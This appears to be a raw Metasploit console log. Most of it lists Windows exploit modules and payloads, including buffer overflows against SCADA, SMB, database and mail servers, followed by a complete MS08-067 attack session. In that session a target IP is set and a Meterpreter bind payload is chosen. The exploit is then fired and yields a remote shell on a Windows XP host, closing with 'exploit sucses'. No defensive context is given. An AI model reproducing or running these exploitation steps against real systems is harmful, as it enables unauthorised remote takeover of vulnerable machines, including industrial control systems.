   windows/misc/ib_svc_attach                                     2007-10-03       good       Borland InterBase SVC_attach() Buffer Overflow
   windows/misc/ibm_tsm_cad_ping                                  2009-11-04       good       IBM Tivoli Storage Manager Express CAD Service Buffer Overflow
   windows/misc/ibm_tsm_rca_dicugetidentify                       2009-11-04       great      IBM Tivoli Storage Manager Express RCA Service Buffer Overflow
   windows/misc/landesk_aolnsrvr                                  2007-04-13       average    LANDesk Management Suite 8.7 Alert Service Buffer Overflow
   windows/misc/mercury_phonebook                                 2005-12-19       average    Mercury/32 <= v4.01b PH Server Module Buffer Overflow
   windows/misc/mini_stream                                       2009-12-25       normal     Mini-Stream 3.0.1.1 Buffer Overflow Exploit
   windows/misc/mirc_privmsg_server                               2008-10-02       normal     mIRC <= 6.34 PRIVMSG Handling Stack Buffer Overflow
   windows/misc/ms07_064_sami                                     2007-12-11       normal     Microsoft DirectX DirectShow SAMI Buffer Overflow
   windows/misc/netcat110_nt                                      2004-12-27       great      Netcat v1.10 NT Stack Buffer Overflow
   windows/misc/nettransport                                      2010-01-02       normal     NetTransport Download Manager 2.90.510 Buffer Overflow
   windows/misc/poppeeper_date                                    2009-02-27       normal     POP Peeper v3.4 DATE Buffer Overflow
   windows/misc/poppeeper_uidl                                    2009-02-27       normal     POP Peeper v3.4 UIDL Buffer Overflow
   windows/misc/pxexploit                                         2011-08-05       excellent  PXE exploit server
   windows/misc/realtek_playlist                                  2008-12-16       great      Realtek Media Player Playlist Buffer Overflow
   windows/misc/sap_2005_license                                  2009-08-01       great      SAP Business One License Manager 2005 Buffer Overflow
   windows/misc/shixxnote_font                                    2004-10-04       great      ShixxNOTE 6.net Font Field Overflow
   windows/misc/splayer_content_type                              2011-05-04       normal     SPlayer 3.7 Content-Type Buffer Overflow
   windows/misc/stream_down_bof                                                    good       StreamDown 6.8.0 Buffer overflow
   windows/misc/talkative_response                                2009-03-17       normal     Talkative IRC v0.4.4.16 Response Buffer Overflow
   windows/misc/tiny_identd_overflow                              2007-05-14       average    TinyIdentD 2.2 Stack Buffer Overflow
   windows/misc/ufo_ai                                            2009-10-28       average    UFO: Alien Invasion IRC Client Buffer Overflow Exploit
   windows/misc/windows_rsh                                       2007-07-24       average    Windows RSH daemon Buffer Overflow
   windows/misc/wireshark_lua                                     2011-07-18       excellent  Wireshark console.lua pre-loading vulnerability
   windows/misc/wireshark_packet_dect                             2011-04-18       good       Wireshark <= 1.4.4 packet-dect.c Stack Buffer Overflow (remote)
   windows/mmsp/ms10_025_wmss_connect_funnel                      2010-04-13       great      Windows Media Services ConnectFunnel Stack Buffer Overflow
   windows/motorola/timbuktu_fileupload                           2008-05-10       excellent  Timbuktu Pro Directory Traversal/File Upload
   windows/mssql/lyris_listmanager_weak_pass                      2005-12-08       excellent  Lyris ListManager MSDE Weak sa Password
   windows/mssql/ms02_039_slammer                                 2002-07-24       good       Microsoft SQL Server Resolution Overflow
   windows/mssql/ms02_056_hello                                   2002-08-05       good       Microsoft SQL Server Hello Overflow
   windows/mssql/ms09_004_sp_replwritetovarbin                    2008-12-09       good       Microsoft SQL Server sp_replwritetovarbin Memory Corruption
   windows/mssql/ms09_004_sp_replwritetovarbin_sqli               2008-12-09       excellent  Microsoft SQL Server sp_replwritetovarbin Memory Corruption via SQL Injection
   windows/mssql/mssql_payload                                    2000-05-30       excellent  Microsoft SQL Server Payload Execution
   windows/mssql/mssql_payload_sqli                               2000-05-30       excellent  Microsoft SQL Server Payload Execution via SQL injection
   windows/mysql/mysql_payload                                    2009-01-16       excellent  Oracle MySQL for Microsoft Windows Payload Execution
   windows/mysql/mysql_yassl_hello                                2008-01-04       average    MySQL yaSSL SSL Hello Message Buffer Overflow
   windows/nfs/xlink_nfsd                                         2006-11-06       average    Omni-NFS Server Buffer Overflow
   windows/nntp/ms05_030_nntp                                     2005-06-14       normal     Microsoft Outlook Express NNTP Response Parsing Buffer Overflow
   windows/novell/groupwisemessenger_client                       2008-07-02       normal     Novell GroupWise Messenger Client Buffer Overflow
   windows/novell/nmap_stor                                       2006-12-23       average    Novell NetMail <= 3.52d NMAP STOR Buffer Overflow
   windows/novell/zenworks_desktop_agent                          2005-05-19       good       Novell ZENworks 6.5 Desktop/Server Management Overflow
   windows/oracle/extjob                                          2007-01-01       excellent  Oracle Job Scheduler Named Pipe Command Execution
   windows/oracle/osb_ndmp_auth                                   2009-01-14       good       Oracle Secure Backup NDMP_CONNECT_CLIENT_AUTH Buffer Overflow
   windows/oracle/tns_arguments                                   2001-06-28       good       Oracle 8i TNS Listener (ARGUMENTS) Buffer Overflow
   windows/oracle/tns_auth_sesskey                                2009-10-20       great      Oracle 10gR2 TNS Listener AUTH_SESSKEY Buffer Overflow
   windows/oracle/tns_service_name                                2002-05-27       good       Oracle 8i TNS Listener SERVICE_NAME Buffer Overflow
   windows/pop3/seattlelab_pass                                   2003-05-07       great      Seattle Lab Mail 5.5 POP3 Buffer Overflow
   windows/postgres/postgres_payload                              2009-04-10       excellent  PostgreSQL for Microsoft Windows Payload Execution
   windows/proxy/bluecoat_winproxy_host                           2005-01-05       great      Blue Coat WinProxy Host Header Overflow
   windows/proxy/ccproxy_telnet_ping                              2004-11-11       average    CCProxy <= v6.2 Telnet Proxy Ping Overflow
   windows/proxy/proxypro_http_get                                2004-02-23       great      Proxy-Pro Professional GateKeeper 4.7 GET Request Overflow
   windows/proxy/qbik_wingate_wwwproxy                            2006-06-07       good       Qbik WinGate WWW Proxy Server URL Processing Overflow
   windows/scada/citect_scada_odbc                                2008-06-11       normal     CitectSCADA/CitectFacilities ODBC Buffer Overflow
   windows/scada/codesys_web_server                               2011-12-02       normal     SCADA 3S CoDeSys CmpWebServer <= v3.4 SP4 Patch 2 Stack Buffer Overflow
   windows/scada/daq_factory_bof                                  2011-09-13       good       DaqFactory HMI NETB Request Overflow
   windows/scada/factorylink_csservice                            2011-03-25       normal     Siemens FactoryLink 8 CSService Logging Path Param Buffer Overflow
   windows/scada/factorylink_vrn_09                               2011-03-21       average    Siemens FactoryLink vrn.exe Opcode 9 Buffer Overflow
   windows/scada/iconics_genbroker                                2011-03-21       good       Iconics GENESIS32 Integer overflow version 9.21.201.01
   windows/scada/iconics_webhmi_setactivexguid                    2011-05-05       good       ICONICS WebHMI ActiveX Buffer Overflow
   windows/scada/igss9_igssdataserver_listall                     2011-03-24       good       7-Technologies IGSS <= v9.00.00 b11063 IGSSdataServer.exe Stack Buffer Overflow
   windows/scada/igss9_igssdataserver_rename                      2011-03-24       normal     7-Technologies IGSS 9 IGSSdataServer .RMS Rename Buffer Overflow
   windows/scada/igss9_misc                                       2011-03-24       excellent  7-Technologies IGSS 9 Data Server/Collector Packet Handling Vulnerabilities
   windows/scada/moxa_mdmtool                                     2010-10-20       great      MOXA Device Manager Tool 2.1 Buffer Overflow
   windows/scada/procyon_core_server                              2011-09-08       normal     Procyon Core Server HMI <= v1.13 Coreservice.exe Stack Buffer Overflow
   windows/scada/realwin                                          2008-09-26       great      DATAC RealWin SCADA Server Buffer Overflow
   windows/scada/realwin_on_fc_binfile_a                          2011-03-21       great      DATAC RealWin SCADA Server 2 On_FC_CONNECT_FCS_a_FILE Buffer Overflow
   windows/scada/realwin_on_fcs_login                             2011-03-21       great      RealWin SCADA Server DATAC Login Buffer Overflow
   windows/scada/realwin_scpc_initialize                          2010-10-15       great      DATAC RealWin SCADA Server SCPC_INITIALIZE Buffer Overflow
   windows/scada/realwin_scpc_initialize_rf                       2010-10-15       great      DATAC RealWin SCADA Server SCPC_INITIALIZE_RF Buffer Overflow
   windows/scada/realwin_scpc_txtevent                            2010-11-18       great      DATAC RealWin SCADA Server SCPC_TXTEVENT Buffer Overflow
   windows/scada/scadapro_cmdexe                                  2011-09-16       excellent  Measuresoft ScadaPro <= 4.0.0 Remote Command Execution
   windows/scada/winlog_runtime                                   2011-01-13       great      Sielco Sistemi Winlog Buffer Overflow
   windows/sip/aim_triton_cseq                                    2006-07-10       great      AIM Triton 1.0.4 CSeq Buffer Overflow
   windows/sip/sipxezphone_cseq                                   2006-07-10       great      SIPfoundry sipXezPhone 0.35a CSeq Field Overflow
   windows/sip/sipxphone_cseq                                     2006-07-10       great      SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow
   windows/smb/ms03_049_netapi                                    2003-11-11       good       Microsoft Workstation Service NetAddAlternateComputerName Overflow
   windows/smb/ms04_007_killbill                                  2004-02-10       low        Microsoft ASN.1 Library Bitstring Heap Overflow
   windows/smb/ms04_011_lsass                                     2004-04-13       good       Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow
   windows/smb/ms04_031_netdde                                    2004-10-12       good       Microsoft NetDDE Service Overflow
   windows/smb/ms05_039_pnp                                       2005-08-09       good       Microsoft Plug and Play Service Overflow
   windows/smb/ms06_025_rasmans_reg                               2006-06-13       good       Microsoft RRAS Service RASMAN Registry Overflow
   windows/smb/ms06_025_rras                                      2006-06-13       average    Microsoft RRAS Service Overflow
   windows/smb/ms06_040_netapi                                    2006-08-08       good       Microsoft Server Service NetpwPathCanonicalize Overflow
   windows/smb/ms06_066_nwapi                                     2006-11-14       good       Microsoft Services MS06-066 nwapi32.dll
   windows/smb/ms06_066_nwwks                                     2006-11-14       good       Microsoft Services MS06-066 nwwks.dll
   windows/smb/ms06_070_wkssvc                                    2006-11-14       manual     Microsoft Workstation Service NetpManageIPCConnect Overflow
   windows/smb/ms07_029_msdns_zonename                            2007-04-12       manual     Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB)
   windows/smb/ms08_067_netapi                                    2008-10-28       great      Microsoft Server Service Relative Path Stack Corruption
   windows/smb/ms09_050_smb2_negotiate_func_index                 2009-09-07       good       Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
   windows/smb/ms10_061_spoolss                                   2010-09-14       excellent  Microsoft Print Spooler Service Impersonation Vulnerability
   windows/smb/netidentity_xtierrpcpipe                           2009-04-06       great      Novell NetIdentity Agent XTIERRPCPIPE Named Pipe Buffer Overflow
   windows/smb/psexec                                             1999-01-01       manual     Microsoft Windows Authenticated User Code Execution
   windows/smb/smb_relay                                          2001-03-31       excellent  Microsoft Windows SMB Relay Code Execution
   windows/smb/timbuktu_plughntcommand_bof                        2009-06-25       great      Timbuktu <= 8.6.6 PlughNTCommand Named Pipe Buffer Overflow
   windows/smtp/mailcarrier_smtp_ehlo                             2004-10-26       good       TABS MailCarrier v2.51 SMTP EHLO Overflow
   windows/smtp/mercury_cram_md5                                  2007-08-18       great      Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow
   windows/smtp/ms03_046_exchange2000_xexch50                     2003-10-15       good       MS03-046 Exchange 2000 XEXCH50 Heap Overflow
   windows/smtp/njstar_smtp_bof                                   2011-10-31       normal     NJStar Communicator 3.00 MiniSMTP Server Remote Exploit
   windows/smtp/wmailserver                                       2005-07-11       average    SoftiaCom WMailserver 1.0 Buffer Overflow
   windows/smtp/ypops_overflow1                                   2004-09-27       average    YPOPS 0.6 Buffer Overflow
   windows/ssh/freeftpd_key_exchange                              2006-05-12       average    FreeFTPd 1.0.10 Key Exchange Algorithm String Buffer Overflow
   windows/ssh/freesshd_key_exchange                              2006-05-12       average    FreeSSHd 1.0.9 Key Exchange Algorithm String Buffer Overflow
   windows/ssh/putty_msg_debug                                    2002-12-16       normal     PuTTy.exe <= v0.53 Buffer Overflow
   windows/ssh/securecrt_ssh1                                     2002-07-23       average    SecureCRT <= 4.0 Beta 2 SSH1 Buffer Overflow
   windows/ssl/ms04_011_pct                                       2004-04-13       average    Microsoft Private Communications Transport Overflow
   windows/telnet/gamsoft_telsrv_username                         2000-07-17       average    GAMSoft TelSrv 1.5 Username Buffer Overflow
   windows/telnet/goodtech_telnet                                 2005-03-15       average    GoodTech Telnet Server <= 5.0.6 Buffer Overflow
   windows/tftp/attftp_long_filename                              2006-11-27       average    Allied Telesyn TFTP Server 1.9 Long Filename Overflow
   windows/tftp/dlink_long_filename                               2007-03-12       good       D-Link TFTP 1.0 Long Filename Buffer Overflow
   windows/tftp/futuresoft_transfermode                           2005-05-31       average    FutureSoft TFTP Server 2000 Transfer-Mode Overflow
   windows/tftp/opentftp_error_code                               2008-07-05       average    OpenTFTP SP 1.4 Error Packet Overflow
   windows/tftp/quick_tftp_pro_mode                               2008-03-27       good       Quick FTP Pro 2.1 Transfer-Mode Overflow
   windows/tftp/tftpd32_long_filename                             2002-11-19       average    TFTPD32 <= 2.21 Long Filename Buffer Overflow
   windows/tftp/tftpdwin_long_filename                            2006-09-21       great      TFTPDWIN v0.4.2 Long Filename Buffer Overflow
   windows/tftp/threectftpsvc_long_mode                           2006-11-27       great      3CTftpSvc TFTP Long Mode Buffer Overflow
   windows/unicenter/cam_log_security                             2005-08-22       great      CA CAM log_security() Stack Buffer Overflow (Win32)
   windows/vnc/realvnc_client                                     2001-01-29       normal     RealVNC 3.3.7 Client Buffer Overflow
   windows/vnc/ultravnc_client                                    2006-04-04       normal     UltraVNC 1.0.1 Client Buffer Overflow
   windows/vnc/winvnc_http_get                                    2001-01-29       average    WinVNC Web Server <= v3.3.3r7 GET Overflow
   windows/vpn/safenet_ike_11                                     2009-06-01       average    SafeNet SoftRemote IKE Service Buffer Overflow
   windows/wins/ms04_045_wins                                     2004-12-14       great      Microsoft WINS Service Memory Overwrite

msf > use windows/smb/ms08_067_netapi 
msf  exploit(ms08_067_netapi) > show options


Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf  exploit(ms08_067_netapi) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
msf  exploit(ms08_067_netapi) > show options


Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.56.101   yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf  exploit(ms08_067_netapi) > show payloads

Compatible Payloads
===================

   Name                                             Disclosure Date  Rank    Description
   ----                                             ---------------  ----    -----------
   generic/custom                                                    normal  Custom Payload
   generic/debug_trap                                                normal  Generic x86 Debug Trap
   generic/shell_bind_tcp                                            normal  Generic Command Shell, Bind TCP Inline
   generic/shell_reverse_tcp                                         normal  Generic Command Shell, Reverse TCP Inline
   generic/tight_loop                                                normal  Generic x86 Tight Loop
   windows/adduser                                                   normal  Windows Execute net user /ADD
   windows/dllinject/bind_ipv6_tcp                                   normal  Reflective Dll Injection, Bind TCP Stager (IPv6)
   windows/dllinject/bind_nonx_tcp                                   normal  Reflective Dll Injection, Bind TCP Stager (No NX or Win7)
   windows/dllinject/bind_tcp                                        normal  Reflective Dll Injection, Bind TCP Stager
   windows/dllinject/reverse_http                                    normal  Reflective Dll Injection, Reverse HTTP Stager
   windows/dllinject/reverse_ipv6_http                               normal  Reflective Dll Injection, Reverse HTTP Stager (IPv6)
   windows/dllinject/reverse_ipv6_tcp                                normal  Reflective Dll Injection, Reverse TCP Stager (IPv6)
   windows/dllinject/reverse_nonx_tcp                                normal  Reflective Dll Injection, Reverse TCP Stager (No NX or Win7)
   windows/dllinject/reverse_ord_tcp                                 normal  Reflective Dll Injection, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/dllinject/reverse_tcp                                     normal  Reflective Dll Injection, Reverse TCP Stager
   windows/dllinject/reverse_tcp_allports                            normal  Reflective Dll Injection, Reverse All-Port TCP Stager
   windows/dllinject/reverse_tcp_dns                                 normal  Reflective Dll Injection, Reverse TCP Stager (DNS)
   windows/download_exec                                             normal  Windows Executable Download and Execute
   windows/exec                                                      normal  Windows Execute Command
   windows/loadlibrary                                               normal  Windows LoadLibrary Path
   windows/messagebox                                                normal  Windows MessageBox
   windows/meterpreter/bind_ipv6_tcp                                 normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager (IPv6)
   windows/meterpreter/bind_nonx_tcp                                 normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)
   windows/meterpreter/bind_tcp                                      normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager
   windows/meterpreter/reverse_http                                  normal  Windows Meterpreter (Reflective Injection), Reverse HTTP Stager
   windows/meterpreter/reverse_https                                 normal  Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager
   windows/meterpreter/reverse_ipv6_http                             normal  Windows Meterpreter (Reflective Injection), Reverse HTTP Stager (IPv6)
   windows/meterpreter/reverse_ipv6_https                            normal  Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager (IPv6)
   windows/meterpreter/reverse_ipv6_tcp                              normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)
   windows/meterpreter/reverse_nonx_tcp                              normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)
   windows/meterpreter/reverse_ord_tcp                               normal  Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   windows/meterpreter/reverse_tcp                                   normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager
   windows/meterpreter/reverse_tcp_allports                          normal  Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
   windows/meterpreter/reverse_tcp_dns                               normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)
   windows/metsvc_bind_tcp                                           normal  Windows Meterpreter Service, Bind TCP
   windows/metsvc_reverse_tcp                                        normal  Windows Meterpreter Service, Reverse TCP Inline
   windows/patchupdllinject/bind_ipv6_tcp                            normal  Windows Inject DLL, Bind TCP Stager (IPv6)
   windows/patchupdllinject/bind_nonx_tcp                            normal  Windows Inject DLL, Bind TCP Stager (No NX or Win7)
   windows/patchupdllinject/bind_tcp                                 normal  Windows Inject DLL, Bind TCP Stager
   windows/patchupdllinject/reverse_ipv6_tcp                         normal  Windows Inject DLL, Reverse TCP Stager (IPv6)
   windows/patchupdllinject/reverse_nonx_tcp                         normal  Windows Inject DLL, Reverse TCP Stager (No NX or Win7)
   windows/patchupdllinject/reverse_ord_tcp                          normal  Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/patchupdllinject/reverse_tcp                              normal  Windows Inject DLL, Reverse TCP Stager
   windows/patchupdllinject/reverse_tcp_allports                     normal  Windows Inject DLL, Reverse All-Port TCP Stager
   windows/patchupdllinject/reverse_tcp_dns                          normal  Windows Inject DLL, Reverse TCP Stager (DNS)
   windows/patchupmeterpreter/bind_ipv6_tcp                          normal  Windows Meterpreter (skape/jt injection), Bind TCP Stager (IPv6)
   windows/patchupmeterpreter/bind_nonx_tcp                          normal  Windows Meterpreter (skape/jt injection), Bind TCP Stager (No NX or Win7)
   windows/patchupmeterpreter/bind_tcp                               normal  Windows Meterpreter (skape/jt injection), Bind TCP Stager
   windows/patchupmeterpreter/reverse_ipv6_tcp                       normal  Windows Meterpreter (skape/jt injection), Reverse TCP Stager (IPv6)
   windows/patchupmeterpreter/reverse_nonx_tcp                       normal  Windows Meterpreter (skape/jt injection), Reverse TCP Stager (No NX or Win7)
   windows/patchupmeterpreter/reverse_ord_tcp                        normal  Windows Meterpreter (skape/jt injection), Reverse Ordinal TCP Stager (No NX or Win7)
   windows/patchupmeterpreter/reverse_tcp                            normal  Windows Meterpreter (skape/jt injection), Reverse TCP Stager
   windows/patchupmeterpreter/reverse_tcp_allports                   normal  Windows Meterpreter (skape/jt injection), Reverse All-Port TCP Stager
   windows/patchupmeterpreter/reverse_tcp_dns                        normal  Windows Meterpreter (skape/jt injection), Reverse TCP Stager (DNS)
   windows/shell/bind_ipv6_tcp                                       normal  Windows Command Shell, Bind TCP Stager (IPv6)
   windows/shell/bind_nonx_tcp                                       normal  Windows Command Shell, Bind TCP Stager (No NX or Win7)
   windows/shell/bind_tcp                                            normal  Windows Command Shell, Bind TCP Stager
   windows/shell/reverse_http                                        normal  Windows Command Shell, Reverse HTTP Stager
   windows/shell/reverse_ipv6_http                                   normal  Windows Command Shell, Reverse HTTP Stager (IPv6)
   windows/shell/reverse_ipv6_tcp                                    normal  Windows Command Shell, Reverse TCP Stager (IPv6)
   windows/shell/reverse_nonx_tcp                                    normal  Windows Command Shell, Reverse TCP Stager (No NX or Win7)
   windows/shell/reverse_ord_tcp                                     normal  Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/shell/reverse_tcp                                         normal  Windows Command Shell, Reverse TCP Stager
   windows/shell/reverse_tcp_allports                                normal  Windows Command Shell, Reverse All-Port TCP Stager
   windows/shell/reverse_tcp_dns                                     normal  Windows Command Shell, Reverse TCP Stager (DNS)
   windows/shell_bind_tcp                                            normal  Windows Command Shell, Bind TCP Inline
   windows/shell_reverse_tcp                                         normal  Windows Command Shell, Reverse TCP Inline
   windows/speak_pwned                                               normal  Windows Speech API - Say "You Got Pwned!"
   windows/upexec/bind_ipv6_tcp                                      normal  Windows Upload/Execute, Bind TCP Stager (IPv6)
   windows/upexec/bind_nonx_tcp                                      normal  Windows Upload/Execute, Bind TCP Stager (No NX or Win7)
   windows/upexec/bind_tcp                                           normal  Windows Upload/Execute, Bind TCP Stager
   windows/upexec/reverse_http                                       normal  Windows Upload/Execute, Reverse HTTP Stager
   windows/upexec/reverse_ipv6_http                                  normal  Windows Upload/Execute, Reverse HTTP Stager (IPv6)
   windows/upexec/reverse_ipv6_tcp                                   normal  Windows Upload/Execute, Reverse TCP Stager (IPv6)
   windows/upexec/reverse_nonx_tcp                                   normal  Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
   windows/upexec/reverse_ord_tcp                                    normal  Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/upexec/reverse_tcp                                        normal  Windows Upload/Execute, Reverse TCP Stager
   windows/upexec/reverse_tcp_allports                               normal  Windows Upload/Execute, Reverse All-Port TCP Stager
   windows/upexec/reverse_tcp_dns                                    normal  Windows Upload/Execute, Reverse TCP Stager (DNS)
   windows/vncinject/bind_ipv6_tcp                                   normal  VNC Server (Reflective Injection), Bind TCP Stager (IPv6)
   windows/vncinject/bind_nonx_tcp                                   normal  VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)
   windows/vncinject/bind_tcp                                        normal  VNC Server (Reflective Injection), Bind TCP Stager
   windows/vncinject/reverse_http                                    normal  VNC Server (Reflective Injection), Reverse HTTP Stager
   windows/vncinject/reverse_ipv6_http                               normal  VNC Server (Reflective Injection), Reverse HTTP Stager (IPv6)
   windows/vncinject/reverse_ipv6_tcp                                normal  VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
   windows/vncinject/reverse_nonx_tcp                                normal  VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
   windows/vncinject/reverse_ord_tcp                                 normal  VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   windows/vncinject/reverse_tcp                                     normal  VNC Server (Reflective Injection), Reverse TCP Stager
   windows/vncinject/reverse_tcp_allports                            normal  VNC Server (Reflective Injection), Reverse All-Port TCP Stager
   windows/vncinject/reverse_tcp_dns                                 normal  VNC Server (Reflective Injection), Reverse TCP Stager (DNS)

msf  exploit(ms08_067_netapi) > set payload windows/meterpreter/bind_tcp 
payload => windows/meterpreter/bind_tcp
msf  exploit(ms08_067_netapi) > check


[*] Verifying vulnerable status... (path: 0x0000005a)
[+] The target is vulnerable.
msf  exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:54514 -> 192.168.56.101:4444) at 2012-01-28 04:27:42 +0700

meterpreter > sysinfo
Computer        : WEKO-0EDF4996FA
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > shell
Process 1448 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

 exploit sucses